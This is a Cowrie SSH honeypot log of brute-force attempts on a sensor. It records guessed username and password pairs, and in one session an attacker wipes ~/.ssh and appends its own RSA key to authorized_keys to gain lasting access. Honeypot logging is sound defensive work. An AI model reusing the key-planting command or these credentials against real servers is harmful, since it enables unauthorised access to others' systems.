{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:06:12.555442Z","src_ip":"212.227.235.229","session":"428b5c7ef165"}
{"eventid":"cowrie.login.success","username":"root","password":"6yhn&UJM","message":"login attempt [root/6yhn&UJM] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:06:13.459200Z","src_ip":"212.227.235.229","session":"428b5c7ef165"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:06:13.928764Z","src_ip":"212.227.235.229","session":"428b5c7ef165"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:06:13.929431Z","src_ip":"212.227.235.229","session":"428b5c7ef165"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:06:13.969409Z","src_ip":"212.227.235.229","session":"428b5c7ef165"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:06:14.193094Z","src_ip":"212.227.235.229","session":"428b5c7ef165"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:06:14.655345Z","src_ip":"212.227.235.229","session":"428b5c7ef165"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:06:14.656017Z","src_ip":"212.227.235.229","session":"428b5c7ef165"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:06:14.887176Z","src_ip":"212.227.235.229","session":"428b5c7ef165"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:06:14.888152Z","src_ip":"212.227.235.229","session":"428b5c7ef165"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58000,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e35560a03cf","protocol":"ssh","message":"New connection: 212.227.235.229:58000 (1.2.3.4:22) [session: 6e35560a03cf]","sensor":"my-vps","timestamp":"2025-09-08T14:06:16.111168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:06:16.114499Z","src_ip":"212.227.235.229","session":"6e35560a03cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:06:16.338832Z","src_ip":"212.227.235.229","session":"6e35560a03cf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:06:17.250554Z","src_ip":"212.227.235.229","session":"6e35560a03cf"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:06:18.484379Z","src_ip":"212.227.235.229","session":"6e35560a03cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59120,"dst_ip":"1.2.3.4","dst_port":22,"session":"2680d2db72c0","protocol":"ssh","message":"New connection: 212.227.235.229:59120 (1.2.3.4:22) [session: 2680d2db72c0]","sensor":"my-vps","timestamp":"2025-09-08T14:06:18.708967Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:06:18.712668Z","src_ip":"212.227.235.229","session":"2680d2db72c0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:06:18.936033Z","src_ip":"212.227.235.229","session":"2680d2db72c0"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":48976,"dst_ip":"1.2.3.4","dst_port":22,"session":"e659450262fb","protocol":"ssh","message":"New connection: 134.199.174.250:48976 (1.2.3.4:22) [session: e659450262fb]","sensor":"my-vps","timestamp":"2025-09-08T14:06:19.021939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:06:19.022802Z","src_ip":"134.199.174.250","session":"e659450262fb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:06:19.306197Z","src_ip":"134.199.174.250","session":"e659450262fb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:06:19.840043Z","src_ip":"212.227.235.229","session":"2680d2db72c0"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:06:20.066209Z","src_ip":"212.227.235.229","session":"428b5c7ef165"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:06:20.067266Z","src_ip":"212.227.235.229","session":"2680d2db72c0"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"pass123","message":"login attempt [tomcat/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T14:06:20.193891Z","src_ip":"134.199.174.250","session":"e659450262fb"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:06:21.560762Z","src_ip":"134.199.174.250","session":"e659450262fb"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.62","src_port":48172,"dst_ip":"1.2.3.4","dst_port":22,"session":"162454b4f48f","protocol":"ssh","message":"New connection: 92.118.39.62:48172 (1.2.3.4:22) [session: 162454b4f48f]","sensor":"my-vps","timestamp":"2025-09-08T14:06:38.407445Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:06:38.438407Z","src_ip":"92.118.39.62","session":"162454b4f48f"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":50564,"dst_ip":"1.2.3.4","dst_port":22,"session":"49bacdf6aabb","protocol":"ssh","message":"New connection: 134.199.174.250:50564 (1.2.3.4:22) [session: 49bacdf6aabb]","sensor":"my-vps","timestamp":"2025-09-08T14:06:50.483211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:06:50.484295Z","src_ip":"134.199.174.250","session":"49bacdf6aabb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:06:50.738540Z","src_ip":"134.199.174.250","session":"49bacdf6aabb"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"123abc","message":"login attempt [tomcat/123abc] failed","sensor":"my-vps","timestamp":"2025-09-08T14:06:51.758625Z","src_ip":"134.199.174.250","session":"49bacdf6aabb"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:06:53.020750Z","src_ip":"134.199.174.250","session":"49bacdf6aabb"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":50136,"dst_ip":"1.2.3.4","dst_port":22,"session":"a61d58fcfaaa","protocol":"ssh","message":"New connection: 134.199.174.250:50136 (1.2.3.4:22) [session: a61d58fcfaaa]","sensor":"my-vps","timestamp":"2025-09-08T14:07:21.532801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:07:21.533858Z","src_ip":"134.199.174.250","session":"a61d58fcfaaa"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:07:21.795312Z","src_ip":"134.199.174.250","session":"a61d58fcfaaa"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"1234567890","message":"login attempt [weblogic/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T14:07:22.991131Z","src_ip":"134.199.174.250","session":"a61d58fcfaaa"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:07:24.257565Z","src_ip":"134.199.174.250","session":"a61d58fcfaaa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54364,"dst_ip":"1.2.3.4","dst_port":22,"session":"35c5d1e3f570","protocol":"ssh","message":"New connection: 212.227.235.229:54364 (1.2.3.4:22) [session: 35c5d1e3f570]","sensor":"my-vps","timestamp":"2025-09-08T14:07:37.617586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:07:37.618626Z","src_ip":"212.227.235.229","session":"35c5d1e3f570"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:07:38.524928Z","src_ip":"212.227.235.229","session":"35c5d1e3f570"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45812,"dst_ip":"1.2.3.4","dst_port":23,"session":"e94499a2e343","protocol":"telnet","message":"New connection: 212.227.235.229:45812 (1.2.3.4:23) [session: e94499a2e343]","sensor":"my-vps","timestamp":"2025-09-08T14:07:39.410211Z"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"12345","message":"login attempt [nginx/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T14:07:39.469043Z","src_ip":"212.227.235.229","session":"35c5d1e3f570"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:07:40.699395Z","src_ip":"212.227.235.229","session":"35c5d1e3f570"}
{"eventid":"cowrie.session.closed","duration":13.130991697311401,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:07:52.541135Z","src_ip":"212.227.235.229","session":"e94499a2e343"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":45652,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea518a30433a","protocol":"ssh","message":"New connection: 134.199.174.250:45652 (1.2.3.4:22) [session: ea518a30433a]","sensor":"my-vps","timestamp":"2025-09-08T14:07:52.739295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:07:52.740297Z","src_ip":"134.199.174.250","session":"ea518a30433a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T14:07:53.019987Z","src_ip":"134.199.174.250","session":"ea518a30433a"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"password1","message":"login attempt [weblogic/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T14:07:53.961048Z","src_ip":"134.199.174.250","session":"ea518a30433a"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:07:55.229892Z","src_ip":"134.199.174.250","session":"ea518a30433a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51374,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd5432e350a9","protocol":"ssh","message":"New connection: 217.72.205.35:51374 (1.2.3.4:22) [session: fd5432e350a9]","sensor":"my-vps","timestamp":"2025-09-08T14:08:10.774030Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:08:10.775106Z","src_ip":"217.72.205.35","session":"fd5432e350a9"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":40090,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f348a768d32","protocol":"ssh","message":"New connection: 134.199.174.250:40090 (1.2.3.4:22) [session: 0f348a768d32]","sensor":"my-vps","timestamp":"2025-09-08T14:08:24.401636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T14:08:24.402378Z","src_ip":"134.199.174.250","session":"0f348a768d32"}
